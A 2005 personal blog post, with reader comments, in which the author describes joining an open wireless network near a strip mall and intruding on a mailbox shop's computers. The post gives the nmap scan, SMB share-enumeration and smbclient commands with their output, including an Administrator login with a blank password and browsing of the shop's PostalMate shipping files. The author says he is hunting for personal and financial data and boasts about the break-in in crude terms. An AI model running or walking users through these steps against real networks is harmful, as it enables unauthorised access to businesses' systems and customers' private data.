Wednesday, November 02, 2005

Invading Print Servers
It's been a while since I did some real network invasion. And today, my homesick depression was reaching an all time high ... so I felt making an few stops might be in order.

On my way back to the hotel, I caught a glimpse of what looked like the edge of a strip mall which I thought might be interesting. I had to make a few turns to get into the parking lot, and it almost seemed like they were hiding it from the main highway. The mall was buried behind towering townhouse condos. As I made my way down a small winding road, I came upon this strange ... village. It was quite an impressive real estate project. The condos were narrow, but stood about four stories high. Some of the condos were actually businesses on the bottom. The problem was ... no parking. So as I spun around in my Bug, all I could wonder was "where the fuck do people park around here?". Hell, I might have even stopped into Quizno's for a sub. But after passing the place three times looking for a place to park my car, I gave up and waved goodbye. None of these little businesses looked all that busy, and I could now see why.

As I drove around in circles, Audrey (the laptop) was going nuts. I had KisMac running, and I was picking up an access point at a rate of about every two seconds. By the time I found a spot and parked in it ... I was down to a single access point. But that's okay. I can only rape one at a time, right? Looking ahead of me, I determined that this access point must belong to one of the following businesses: a hair and nail shop, a mailbox shop, an eyeglasses shop, or a small grocery store. The access point, "linksys", happily accepted me as a visitor and set me up with an address to use. I opened a terminal and went right to work.

My first goal, was to get an idea of what was on this network (other than me). So I did a simple nmap scan, and dumped that into a file like this ...

audrey-ii:~ rayhaque$ nmap 192.168.2.1-254 > nmap.log

While that was running (and it was taking it's sweet time), I hopped to a second terminal and ran "findsmb". This is an old samba utility which does an MS Windows style "network browse". The idea being that any Windows-like file server in the immediate network will 'hollar back'.

audrey-ii:~ rayhaque$ findsmb

IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
---------------------------------------------------------------------
192.168.2.100 E-710-109987 +[WORKGROUP] [Windows NT 4.0] [NT LAN Manager 4.0]
audrey-ii:~ rayhaque$ smbclient //192.168.2.100


Hooray, I am not alone. But wait just a damned minute. When was the last time you came across a server running Windows NT. I had my doubts. Usually when nmap tells you that it found an NT server, it's actually found some sort of network appliance.

Next I ran "smbclient" and used it to get a dump of file shares from my new friend. Notice it prompted me for a password, and I declined to offer one up. This indicated that it was okay listing it's shares to an anonymous guy like me.

audrey-ii:~ rayhaque$ smbclient -L //E-710-109987
Password:
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]

Sharename Type Comment
--------- ---- -------
direct Printer direct
ADMIN$ Disk Remote Admin
IPC$ IPC Remote IPC
print Printer print
C$ Disk Default share
D$ Disk Default share
E$ Disk Default share
print$ Disk Printer Drivers
hold Printer hold
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]

Server Comment
--------- -------
E-710-109987

Workgroup Master
--------- -------
MSOFFICE MASTER
WORKGROUP E-710-109987


What the hell is this thing? Is it a print server? Is it just one of those glorified network printers, with PC-like functionality? I decided to try and connect to one of these shared drives and check it out. And while the C$ share most certainly contains the OS, I am wanting to poke through someones personal data or financial information. That's what really makes these sick little excursions worthwhile.

audrey-ii:~ rayhaque$ smbclient //E-710-109987/e$
Password:
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
tree connect failed: NT_STATUS_ACCESS_DENIED


Oh ... so you aren't happy with allowing guests access to your hidden shares? Aren't we picky. How about ... administrators? Any love for an Administrator, with a blank password?

audrey-ii:~ rayhaque$ smbclient //E-710-109987/e$ -U Administrator
Password:
Domain=[WORKGROUP] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \>


That's what I'm talking about. What we have here is an SMB browsing session in progress. It's awaiting my command. Likely, I can now begin searching through files, and if I find something I like, I can "get" it.

smb: \> ls
efi D 0 Wed Oct 30 16:16:53 2002
spool D 0 Mon Apr 26 15:10:28 2004

50516 blocks of size 131072. 48395 blocks available
smb: \>


What on earth? After some poking around in and out of the shares I came to the conclusion that ... this was nothing but a print server. An utterly boring print server. By this time my nmap scan had finished, and I looked through it for my next victim. This was a strange network, in that it had several clients attached to it, but had no Internet gateway, or DNS resolution. It was truely a "workgroup". These networks give me a 'big rubbery one', because most companies don't bother any level of security. Why? Because they aren't connected to anything. Never mind the wireless signal that I used to waltz in from the parking lot.

I poked through my nmap file again and targeted my next victim. This server (?) had the address typically reserved for a gateway/router. Yet, it was a dead end for packets. So I made an attempt to talk to it as a Windows file server. I did a simple anonymous style "share list" against it. It obliged.

audrey-ii:~ rayhaque$ smbclient -L //192.168.2.1
Password:
Anonymous login successful
Domain=[MSOFFICE] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
session request to 192.168.2.1 failed (Called name not present)
session request to 192 failed (Called name not present)
Anonymous login successful
Domain=[MSOFFICE] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------
AUX1
AUX2
MASTER

Workgroup Master
--------- -------
MSOFFICE MASTER
WORKGROUP E-710-109987


This could be interesting, although it may just be another network appliance screwing with me. I think I will check out a different host. Maybe this 192.168.2.4 character. Perhaps it's an actual running PC of some kind.

audrey-ii:~ rayhaque$ smbclient -L //192.168.2.4
Password:
Domain=[MASTER] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
PC Synergy Disk
IPC$ IPC Remote IPC
C Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
session request to 192.168.2.4 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[MASTER] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------


Uh yeah ... this looks like another print server thing. God, I have found the most uninteresting network imaginable to inhabit. But I will look around anyway. This "PC Synergy" thing could possibly be something interesting.

audrey-ii:~ rayhaque$ smbclient "//192.168.2.4/PC Synergy" -U guest
Password:
Domain=[MASTER] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
smb: \> ls
. D 0 Wed Oct 19 07:07:55 2005
.. D 0 Wed Oct 19 07:07:55 2005
PostalMate D 0 Wed Nov 2 16:43:11 2005
POSTALMATEActGrp.xml A 0 Wed Oct 19 07:07:55 2005

38170 blocks of size 524288. 31427 blocks available
smb: \> cd PostalMate
smb: \PostalMate\> ls
. D 0 Wed Nov 2 16:43:11 2005
.. D 0 Wed Nov 2 16:43:11 2005
32767.bmp A 12598 Thu Jun 22 09:51:44 2000
32768.bmp A 49256 Mon Aug 16 08:23:56 2004
32769.bmp A 14470 Mon Dec 4 14:02:26 2000
32770.bmp A 58266 Tue Feb 11 12:10:44 2003
32771.bmp A 15406 Tue Nov 25 07:49:24 2003
32772.bmp A 26100 Thu Sep 23 08:34:46 2004
borlndmm.dll A 25600 Mon Jan 24 06:01:00 2000
CashMate.chm A 228029 Mon Jun 20 13:58:10 2005
Cashmate.exe A 5968384 Thu Sep 22 08:01:00 2005
CashMate.GID AH 41663 Tue Sep 20 13:09:30 2005
Close.exe A 403456 Wed Jul 13 11:26:04 2005
complog.err A 0 Fri Dec 31 16:50:32 2004
DataPurge.dll A 775168 Wed Oct 5 15:25:24 2005
DropOff.dll A 1475072 Wed Oct 5 15:25:24 2005
ElabelSample.txt A 10811 Wed Jan 31 15:02:52 2001
ENHTRKLog.txt A 981 Thu Sep 19 15:04:44 2002
EnhTrkuRsp.txt A 5002 Sun Dec 23 12:08:08 2001
Events.dll A 681984 Wed Oct 5 14:36:35 2005
Events.log A 18221 Wed Oct 5 15:24:59 2005
FedExExpress_QuickRateSettingLog.txt A 408 Thu Jan 6 08:12:24 2005
Global Express Mail.lyt A 2436 Sun Feb 15 21:04:10 2004
Import A 561152 Fri Jan 23 07:45:44 2004
INSTALL.LOG A 7708 Wed Oct 5 15:25:04 2005
libeay32.dll A 651264 Sun Apr 18 16:43:44 2004
License.txt A 18316 Mon Aug 2 09:18:46 2004
Log D 0 Wed Nov 2 08:09:52 2005
MCStrings.txt A 381 Mon Jul 1 13:58:34 2002
midas.dll A 297984 Fri Mar 4 09:02:00 2005
MsgAction1.dll A 695296 Wed Oct 5 15:25:25 2005
MsgDownload.dll A 1114112 Wed Oct 5 15:25:23 2005
MsgRun.dll A 2130432 Wed Oct 5 15:25:23 2005
PDOXUSRS.LCK A 6752256 Wed Nov 2 08:07:29 2005
PDXRBLD.exe A 899072 Wed Jun 22 07:41:00 2005
Pdxrbld.INI A 81 Thu Oct 6 14:28:43 2005
Pdxrbld.LOG A 236 Thu Oct 6 14:27:25 2005
Pdxrbld2.exe A 603648 Fri Aug 3 13:21:00 2001
PMExceptions.txt A 164 Tue Sep 27 10:30:09 2005
PMShipment A 7512 Wed Jan 14 17:09:44 2004
PM_ImportFile.txt A 5359 Mon Oct 23 18:23:16 2000
PM_Win.exe A 15211520 Thu Sep 22 08:00:24 2005
PostalMate.chm A 504423 Tue Sep 6 10:23:56 2005
PostalMate.GID AH 71480 Sat Sep 24 12:44:18 2005
Pre_5_5_5.zip A 481140 Wed Oct 5 15:25:22 2005
Readme.txt A 156358 Wed Sep 21 14:15:22 2005
Setbrows.exe A 4528 Fri Oct 13 15:28:28 1995
ssleay32.dll A 147456 Sun Apr 18 16:43:46 2004
SystemCheck.exe A 941056 Wed Aug 3 10:40:14 2005
SystemUtilities.exe A 2625536 Thu Sep 22 08:01:26 2005
SysUtil.chm A 90859 Wed Aug 31 12:36:02 2005
Tables D 0 Wed Nov 2 17:10:36 2005
UNWISE.EXE A 153088 Fri Jul 26 15:02:06 2002
WSExport.dll A 693760 Thu Aug 11 12:46:18 2005
XMLTransform.dll A 434688 Wed Oct 5 14:36:34 2005
Zebra Dom 1.lyt A 2629 Thu Feb 17 13:45:02 2005
Zebra Dom 2.lyt A 2671 Tue Jun 7 13:53:30 2005
Zebra Dom Express.lyt A 2571 Thu Feb 17 13:45:02 2005
Zebra Dom Postcard.lyt A 2605 Thu Nov 4 09:23:24 2004
Zebra Intl 1.lyt A 3208 Wed Dec 15 07:38:52 2004
Zebra Intl 2.lyt A 2628 Thu Nov 4 09:23:24 2004
_QSQ6.DB A 3008512 Wed Nov 2 08:55:20 2005

38170 blocks of size 524288. 31427 blocks available
smb: \PostalMate\>


Oh - MY - GOD. I am talking to a postage machine. Well, now I know what shop I had targeted. It was the mailbox shop. This had to be the most uneventful adventure EVER. So why did I ever record it for you to read? Why did you even read through all this?

Go away. You bother me.

Historic Comments
Get a Google Map of the place with no parking lots. Perhaps there's parking that you couldn't find. If there truly is no parking there, please post a google maps picture of one of the strangest streets I've ever heard of.

And you should have tried to print some crap out of one of those printers. Something like "I quit" or "The rebellion begins NOW!"
Poe | 11.03.05 - 10:05 pm | #

Hey, Google Maps! Here is a satelite photo of the area. The spot I was in is north of "Beacon Square". It doesn't look like much from this altitude though. You can't make out the intricate little weavings of roads between the big buildings. Like a small german town. From this map, it doesn't even look like the same place. Or maybe it isn't the same place. Perhaps Im lost. You can see by the picture that there are parking lots above, beside, and below the 'campus'/ But these were marked "permit only", and filled up by the condo dwellers.

I was trying to find the Marathon gas station which would have been a good land mark, but it doesn't seem to exist.

Its a government conspiracy.
Ray Dios Haque | 11.04.05 - 3:03 pm | #

Woops ... forgot the map link. Here that is ...

http://maps.google.com/maps?q=qu...06829&t=h& hl=en
Ray Dios Haque | 11.04.05 - 3:04 pm | #

Jesus, those streets are a nightmare. You couldn't find the Quizno's on the map? I tried Google for that, but they all seem to have parking lots. Could be that most of their customers live in nearby apartments, condos, etc. Or those buildings could just be covers for machinery supporting a huge underground government facility. Raccoon City anyone?
Poe | 11.05.05 - 1:51 am | #

Whee, wardriving stories. I need to get me a damn laptop.
SiliconSnake | Homepage | 11.07.05 - 5:09 pm | #

Raaaaaaay. What IRC channel are you haunting now? I miss the milkshake contests. :P
conundrum | 12.07.05 - 11:44 pm | #

The machine you connected to was a windows workstation running a shipping system called "Postalmate 2000" authored by a company called "pcsynergy".
anon | 12.29.06 - 11:57 am | #

You can use nbtenum to enum smb accounts/shares.
jc | 06.06.07 - 10:51 am | #

No comments:

Post a Comment